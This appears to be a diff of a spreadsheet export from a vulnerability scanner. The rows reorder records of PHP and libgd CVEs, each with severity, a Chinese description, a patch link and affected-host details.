+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G377" t="inlineStr">
@@ -46150,7 +46150,7 @@
       </c>
       <c r="J377" t="inlineStr">
         <is>
-          <t>CVE-2016-4539</t>
+          <t>CVE-2016-4537</t>
         </is>
       </c>
       <c r="K377" t="inlineStr">
@@ -46225,7 +46225,7 @@
     <row r="378">
       <c r="A378" t="inlineStr">
         <is>
-          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
+          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
         </is>
       </c>
       <c r="B378" t="inlineStr">
@@ -46240,7 +46240,7 @@
       </c>
       <c r="D378" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E378" t="inlineStr">
@@ -46250,7 +46250,7 @@
       </c>
       <c r="F378" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
+          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
         </is>
       </c>
       <c r="G378" t="inlineStr">
@@ -46270,7 +46270,7 @@
       </c>
       <c r="J378" t="inlineStr">
         <is>
-          <t>CVE-2016-4537</t>
+          <t>CVE-2016-4539</t>
         </is>
       </c>
       <c r="K378" t="inlineStr">
@@ -46345,7 +46345,7 @@
     <row r="379">
       <c r="A379" t="inlineStr">
         <is>
-          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
+          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
         </is>
       </c>
       <c r="B379" t="inlineStr">
@@ -46365,12 +46365,12 @@
       </c>
       <c r="E379" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F379" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G379" t="inlineStr">
@@ -46390,7 +46390,7 @@
       </c>
       <c r="J379" t="inlineStr">
         <is>
-          <t>CVE-2016-4543</t>
+          <t>CVE-2016-4540</t>
         </is>
       </c>
       <c r="K379" t="inlineStr">
@@ -46585,7 +46585,7 @@
     <row r="381">
       <c r="A381" t="inlineStr">
         <is>
-          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
+          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
         </is>
       </c>
       <c r="B381" t="inlineStr">
@@ -46605,12 +46605,12 @@
       </c>
       <c r="E381" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
         </is>
       </c>
       <c r="F381" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G381" t="inlineStr">
@@ -46630,7 +46630,7 @@
       </c>
       <c r="J381" t="inlineStr">
         <is>
-          <t>CVE-2016-4538</t>
+          <t>CVE-2016-4543</t>
         </is>
       </c>
       <c r="K381" t="inlineStr">
@@ -46825,7 +46825,7 @@
     <row r="383">
       <c r="A383" t="inlineStr">
         <is>
-          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
+          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
         </is>
       </c>
       <c r="B383" t="inlineStr">
@@ -46850,7 +46850,7 @@
       </c>
       <c r="F383" t="inlineStr">
         <is>
-          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
         </is>
       </c>
       <c r="G383" t="inlineStr">
@@ -46870,7 +46870,7 @@
       </c>
       <c r="J383" t="inlineStr">
         <is>
-          <t>CVE-2016-4540</t>
+          <t>CVE-2016-4538</t>
         </is>
       </c>
       <c r="K383" t="inlineStr">
@@ -46945,7 +46945,7 @@
     <row r="384">
       <c r="A384" t="inlineStr">
         <is>
-          <t>PHP 基于栈的缓冲区溢出漏洞(CVE-2016-2554)</t>
+          <t>PHP wddx.c释放后重利用漏洞(CVE-2016-3141)</t>
         </is>
       </c>
       <c r="B384" t="inlineStr">
@@ -46965,13 +46965,12 @@
       </c>
       <c r="E384" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://bugs.php.net/bug.php?id=71488</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://secure.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F384" t="inlineStr">
         <is>
-          <t>5.5.32之前的PHP，ext.phar/tar.c中基于堆栈的缓冲区溢出，5.6.18之前的5.6.x和7.0.3之前的7.x允许远程攻击者拒绝服务（应用程序崩溃）或可能通过精心制作的TAR档案具有未指定的其他影响。</t>
+          <t>PHP 5.5.32及之前版本和5.6.19之前5.6.x版本的WDDX扩展中的wddx.c文件存在释放后重用漏洞。远程攻击者可通过触发包含特制var元素的XML数据上的wddx_deserialize调用，利用该漏洞造成拒绝服务（内存损坏和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G384" t="inlineStr">
@@ -46991,7 +46990,7 @@
       </c>
       <c r="J384" t="inlineStr">
         <is>
-          <t>CVE-2016-2554</t>
+          <t>CVE-2016-3141</t>
         </is>
       </c>
       <c r="K384" t="inlineStr">
@@ -47066,7 +47065,7 @@
     <row r="385">
       <c r="A385" t="inlineStr">
         <is>
-          <t>PHP wddx.c释放后重利用漏洞(CVE-2016-3141)</t>
+          <t>PHP 基于栈的缓冲区溢出漏洞(CVE-2016-2554)</t>
         </is>
       </c>
       <c r="B385" t="inlineStr">
@@ -47086,12 +47085,13 @@
       </c>
       <c r="E385" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://secure.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://bugs.php.net/bug.php?id=71488</t>
         </is>
       </c>
       <c r="F385" t="inlineStr">
         <is>
-          <t>PHP 5.5.32及之前版本和5.6.19之前5.6.x版本的WDDX扩展中的wddx.c文件存在释放后重用漏洞。远程攻击者可通过触发包含特制var元素的XML数据上的wddx_deserialize调用，利用该漏洞造成拒绝服务（内存损坏和应用程序崩溃）。</t>
+          <t>5.5.32之前的PHP，ext.phar/tar.c中基于堆栈的缓冲区溢出，5.6.18之前的5.6.x和7.0.3之前的7.x允许远程攻击者拒绝服务（应用程序崩溃）或可能通过精心制作的TAR档案具有未指定的其他影响。</t>
         </is>
       </c>
       <c r="G385" t="inlineStr">
@@ -47111,7 +47111,7 @@
       </c>
       <c r="J385" t="inlineStr">
         <is>
-          <t>CVE-2016-3141</t>
+          <t>CVE-2016-2554</t>
         </is>
       </c>
       <c r="K385" t="inlineStr">
@@ -47186,7 +47186,7 @@
     <row r="386">
       <c r="A386" t="inlineStr">
         <is>
-          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
+          <t>PHP 远程代码执行漏洞(CVE-2015-6834)</t>
         </is>
       </c>
       <c r="B386" t="inlineStr">
@@ -47201,7 +47201,7 @@
       </c>
       <c r="D386" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E386" t="inlineStr">
@@ -47211,7 +47211,7 @@
       </c>
       <c r="F386" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
+          <t>PHP中的5.4.45之前，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的多个Free-After-Use漏洞允许远程攻击者通过与（1）Serializable接口相关的向量执行任意代码，（2 ）SplObjectStorage类，以及（3）SplDoublyLinkedList类，它们在反序列化期间会被错误处理。</t>
         </is>
       </c>
       <c r="G386" t="inlineStr">
@@ -47231,7 +47231,7 @@
       </c>
       <c r="J386" t="inlineStr">
         <is>
-          <t>CVE-2016-1903</t>
+          <t>CVE-2015-6834</t>
         </is>
       </c>
       <c r="K386" t="inlineStr">
@@ -47306,7 +47306,7 @@
     <row r="387">
       <c r="A387" t="inlineStr">
         <is>
-          <t>PHP 远程代码执行漏洞(CVE-2015-6834)</t>
+          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
         </is>
       </c>
       <c r="B387" t="inlineStr">
@@ -47321,7 +47321,7 @@
       </c>
       <c r="D387" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E387" t="inlineStr">
@@ -47331,7 +47331,7 @@
       </c>
       <c r="F387" t="inlineStr">
         <is>
-          <t>PHP中的5.4.45之前，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的多个Free-After-Use漏洞允许远程攻击者通过与（1）Serializable接口相关的向量执行任意代码，（2 ）SplObjectStorage类，以及（3）SplDoublyLinkedList类，它们在反序列化期间会被错误处理。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
         </is>
       </c>
       <c r="G387" t="inlineStr">
@@ -47351,7 +47351,7 @@
       </c>
       <c r="J387" t="inlineStr">
         <is>
-          <t>CVE-2015-6834</t>
+          <t>CVE-2016-1903</t>
         </is>
       </c>
       <c r="K387" t="inlineStr">
@@ -48029,7 +48029,7 @@
     <row r="393">
       <c r="A393" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
         </is>
       </c>
       <c r="B393" t="inlineStr">
@@ -48054,7 +48054,7 @@
       </c>
       <c r="F393" t="inlineStr">
         <is>
-          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
+          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
         </is>
       </c>
       <c r="G393" t="inlineStr">
@@ -48074,7 +48074,7 @@
       </c>
       <c r="J393" t="inlineStr">
         <is>
-          <t>CVE-2016-7411</t>
+          <t>CVE-2016-7417</t>
         </is>
       </c>
       <c r="K393" t="inlineStr">
@@ -48149,7 +48149,7 @@
     <row r="394">
       <c r="A394" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
         </is>
       </c>
       <c r="B394" t="inlineStr">
@@ -48174,7 +48174,7 @@
       </c>
       <c r="F394" t="inlineStr">
         <is>
-          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
+          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
         </is>
       </c>
       <c r="G394" t="inlineStr">
@@ -48194,7 +48194,7 @@
       </c>
       <c r="J394" t="inlineStr">
         <is>
-          <t>CVE-2016-7417</t>
+          <t>CVE-2016-7411</t>
         </is>
       </c>
       <c r="K394" t="inlineStr">
@@ -49112,174 +49112,174 @@
     <row r="402">
       <c r="A402" t="inlineStr">
         <is>
+          <t>PHP curlfile 拒绝服务漏洞(CVE-2016-9137)</t>
+        </is>
+      </c>
+      <c r="B402" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C402" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D402" t="inlineStr">
+        <is>
+          <t>DoS</t>
+        </is>
+      </c>
+      <c r="E402" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.phphttp://www.php.net/ChangeLog-5.php</t>
+        </is>
+      </c>
+      <c r="F402" t="inlineStr">
+        <is>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 5.6.27之前的版本和7.0.12之前的7.x版本中的ext/curl/curl_file.c文件的CURLFile实现过程存在释放后重用漏洞。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务。</t>
+        </is>
+      </c>
+      <c r="G402" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure</t>
+        </is>
+      </c>
+      <c r="H402" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I402" t="inlineStr">
+        <is>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J402" t="inlineStr">
+        <is>
+          <t>CVE-2016-9137</t>
+        </is>
+      </c>
+      <c r="K402" t="inlineStr">
+        <is>
+          <t>2026-06-26 08:05:18</t>
+        </is>
+      </c>
+      <c r="L402" t="inlineStr">
+        <is>
+          <t>2026-06-26 02:38:43</t>
+        </is>
+      </c>
+      <c r="M402" t="inlineStr">
+        <is>
+          <t>10.128.165.151</t>
+        </is>
+      </c>
+      <c r="N402" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O402" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P402" t="inlineStr"/>
+      <c r="Q402" t="inlineStr"/>
+      <c r="R402" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S402" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T402" t="inlineStr">
+        <is>
+          <t>未托管</t>
+        </is>
+      </c>
+      <c r="U402" t="inlineStr">
+        <is>
+          <t>8090</t>
+        </is>
+      </c>
+      <c r="V402" t="inlineStr"/>
+      <c r="W402" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X402" t="inlineStr">
+        <is>
+          <t>组件及版本: PHP:5.6.13</t>
+        </is>
+      </c>
+      <c r="Y402" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z402" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="403">
+      <c r="A403" t="inlineStr">
+        <is>
           <t>PHP WDDX扩展双重释放任意代码执行漏洞(CVE-2016-5772)</t>
         </is>
       </c>
-      <c r="B402" t="inlineStr">
+      <c r="B403" t="inlineStr">
         <is>
           <t>尽快修复</t>
         </is>
       </c>
-      <c r="C402" t="inlineStr">
+      <c r="C403" t="inlineStr">
         <is>
           <t>严重</t>
         </is>
       </c>
-      <c r="D402" t="inlineStr">
+      <c r="D403" t="inlineStr">
         <is>
           <t>Code Execution</t>
         </is>
       </c>
-      <c r="E402" t="inlineStr">
+      <c r="E403" t="inlineStr">
         <is>
           <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
 http://php.net/ChangeLog-5.php
 http://php.net/ChangeLog-7.php</t>
         </is>
       </c>
-      <c r="F402" t="inlineStr">
+      <c r="F403" t="inlineStr">
         <is>
           <t>PHP中的WDDX扩展中的wddx.c文件中的‘php_wddx_process_data ’函数存在双重释放漏洞，该漏洞源于程序没有正确处理wddx_deserialize调用。远程攻击者可借助特制的XML数据利用该漏洞造成拒绝服务（应用程序崩溃），或执行任意代码。</t>
         </is>
       </c>
-      <c r="G402" t="inlineStr">
+      <c r="G403" t="inlineStr">
         <is>
           <t>Vuln with Attack Code Disclosure</t>
         </is>
       </c>
-      <c r="H402" t="inlineStr">
+      <c r="H403" t="inlineStr">
         <is>
           <t>云镜</t>
         </is>
       </c>
-      <c r="I402" t="inlineStr">
+      <c r="I403" t="inlineStr">
         <is>
           <t>版本比对</t>
         </is>
       </c>
-      <c r="J402" t="inlineStr">
+      <c r="J403" t="inlineStr">
         <is>
           <t>CVE-2016-5772</t>
-        </is>
-      </c>
-      <c r="K402" t="inlineStr">
-        <is>
-          <t>2026-06-26 08:05:18</t>
-        </is>
-      </c>
-      <c r="L402" t="inlineStr">
-        <is>
-          <t>2026-06-26 02:38:43</t>
-        </is>
-      </c>
-      <c r="M402" t="inlineStr">
-        <is>
-          <t>10.128.165.151</t>
-        </is>
-      </c>
-      <c r="N402" t="inlineStr">
-        <is>
-          <t>服务器</t>
-        </is>
-      </c>
-      <c r="O402" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P402" t="inlineStr"/>
-      <c r="Q402" t="inlineStr"/>
-      <c r="R402" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S402" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T402" t="inlineStr">
-        <is>
-          <t>未托管</t>
-        </is>
-      </c>
-      <c r="U402" t="inlineStr">
-        <is>
-          <t>8090</t>
-        </is>
-      </c>
-      <c r="V402" t="inlineStr"/>
-      <c r="W402" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X402" t="inlineStr">
-        <is>
-          <t>组件及版本: PHP:5.6.13</t>
-        </is>
-      </c>
-      <c r="Y402" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Z402" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="403">
-      <c r="A403" t="inlineStr">
-        <is>
-          <t>PHP curlfile 拒绝服务漏洞(CVE-2016-9137)</t>
-        </is>
-      </c>
-      <c r="B403" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C403" t="inlineStr">
-        <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D403" t="inlineStr">
-        <is>
-          <t>DoS</t>
-        </is>
-      </c>
-      <c r="E403" t="inlineStr">
-        <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.phphttp://www.php.net/ChangeLog-5.php</t>
-        </is>
-      </c>
-      <c r="F403" t="inlineStr">
-        <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 5.6.27之前的版本和7.0.12之前的7.x版本中的ext/curl/curl_file.c文件的CURLFile实现过程存在释放后重用漏洞。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务。</t>
-        </is>
-      </c>
-      <c r="G403" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
-      <c r="H403" t="inlineStr">
-        <is>
-          <t>云镜</t>
-        </is>
-      </c>
-      <c r="I403" t="inlineStr">
-        <is>
-          <t>版本比对</t>
-        </is>
-      </c>
-      <c r="J403" t="inlineStr">
-        <is>
-          <t>CVE-2016-9137</t>
         </is>
       </c>
       <c r="K403" t="inlineStr">
@@ -49354,7 +49354,7 @@
     <row r="404">
       <c r="A404" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2017-11147)</t>
+          <t>PHP 安全漏洞(CVE-2016-4473)</t>
         </is>
       </c>
       <c r="B404" t="inlineStr">
@@ -49375,12 +49375,12 @@
       <c r="E404" t="inlineStr">
         <is>
           <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-http://php.net/ChangeLog-7.php</t>
+https://bugs.php.net/bug.php?id=72321</t>
         </is>
       </c>
       <c r="F404" t="inlineStr">
         <is>
-          <t>PHP和7.0.15之前的7.x中，提供了恶意归档文件的攻击者可能会使用PHAR归档处理程序，以使PHP解释器崩溃或由于ext中的phar_parse_pharfile函数中的缓冲区被过度读取而可能泄露信息。 /phar/phar.c。</t>
+          <t>PHP 7.0.7和5.6.x中的/ext/phar/phar_object.c允许远程攻击者执行任意代码。</t>
         </is>
       </c>
       <c r="G404" t="inlineStr">
@@ -49400,7 +49400,7 @@
       </c>
       <c r="J404" t="inlineStr">
         <is>
-          <t>CVE-2017-11147</t>
+          <t>CVE-2016-4473</t>
         </is>
       </c>
       <c r="K404" t="inlineStr">
@@ -49475,7 +49475,7 @@
     <row r="405">
       <c r="A405" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2016-4473)</t>
+          <t>PHP 安全漏洞(CVE-2017-11147)</t>
         </is>
       </c>
       <c r="B405" t="inlineStr">
@@ -49496,12 +49496,12 @@
       <c r="E405" t="inlineStr">
         <is>
           <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://bugs.php.net/bug.php?id=72321</t>
+http://php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F405" t="inlineStr">
         <is>
-          <t>PHP 7.0.7和5.6.x中的/ext/phar/phar_object.c允许远程攻击者执行任意代码。</t>
+          <t>PHP和7.0.15之前的7.x中，提供了恶意归档文件的攻击者可能会使用PHAR归档处理程序，以使PHP解释器崩溃或由于ext中的phar_parse_pharfile函数中的缓冲区被过度读取而可能泄露信息。 /phar/phar.c。</t>
         </is>
       </c>
       <c r="G405" t="inlineStr">
@@ -49521,7 +49521,7 @@
       </c>
       <c r="J405" t="inlineStr">
         <is>
-          <t>CVE-2016-4473</t>
+          <t>CVE-2017-11147</t>
         </is>
       </c>
       <c r="K405" t="inlineStr">
@@ -49596,7 +49596,7 @@
     <row r="406">
       <c r="A406" t="inlineStr">
         <is>
-          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2016-10166)</t>
         </is>
       </c>
       <c r="B406" t="inlineStr">
@@ -49611,24 +49611,20 @@
       </c>
       <c r="D406" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E406" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/60bfb401ad5a4a8ae995dcd36372fe15c71e1a35</t>
         </is>
       </c>
       <c r="F406" t="inlineStr">
         <is>
-          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
-        </is>
-      </c>
-      <c r="G406" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
+          <t>GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。GD Graphics Library 2.2.4之前的版本中的gd_interpolation.c文件的‘_gdContributionsAlloc’函数存安全漏洞。远程攻击者可利用该漏洞造成拒绝服务。</t>
+        </is>
+      </c>
+      <c r="G406" t="inlineStr"/>
       <c r="H406" t="inlineStr">
         <is>
           <t>云镜</t>
@@ -49641,7 +49637,7 @@
       </c>
       <c r="J406" t="inlineStr">
         <is>
-          <t>CVE-2016-3074</t>
+          <t>CVE-2016-10166</t>
         </is>
       </c>
       <c r="K406" t="inlineStr">
@@ -49716,7 +49712,7 @@
     <row r="407">
       <c r="A407" t="inlineStr">
         <is>
-          <t>PHP exif_process_tiff_in_jpeg拒绝服务漏洞(CVE-2016-4544)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
         </is>
       </c>
       <c r="B407" t="inlineStr">
@@ -49731,17 +49727,17 @@
       </c>
       <c r="D407" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E407" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
         </is>
       </c>
       <c r="F407" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_TIFF_in_JPEG’函数中存在安全漏洞，该漏洞源于程序没有验证TIFF起始数据。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G407" t="inlineStr">
@@ -49761,7 +49757,7 @@
       </c>
       <c r="J407" t="inlineStr">
         <is>
-          <t>CVE-2016-4544</t>
+          <t>CVE-2016-3078</t>
         </is>
       </c>
       <c r="K407" t="inlineStr">
@@ -49836,7 +49832,7 @@
     <row r="408">
       <c r="A408" t="inlineStr">
         <is>
-          <t>PHP zend_string_extend函数拒绝服务漏洞(CVE-2017-8923)</t>
+          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
         </is>
       </c>
       <c r="B408" t="inlineStr">
@@ -49851,17 +49847,17 @@
       </c>
       <c r="D408" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E408" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=74577</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
         </is>
       </c>
       <c r="F408" t="inlineStr">
         <is>
-          <t>PHP 7.1.5及之前的版本中的Zend/zend_string.h文件的‘zend_string_extend’函数存在安全漏洞，该漏洞源于程序没有阻止字符串对象的更改，导致输出负长度值。远程攻击者可利用该漏洞造成拒绝服务（应用程序崩溃）。</t>
